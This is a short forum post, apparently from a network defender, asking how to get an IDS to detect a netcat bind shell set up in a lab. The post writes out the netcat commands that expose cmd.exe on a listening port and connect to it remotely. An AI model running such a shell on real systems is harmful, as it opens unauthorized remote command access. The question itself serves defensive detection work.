I am doing the following lab testing:
nc -v -l -e cmd.exe -p 565
nc -v x.x.x.x 565
I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?
Any help is highly appreciated.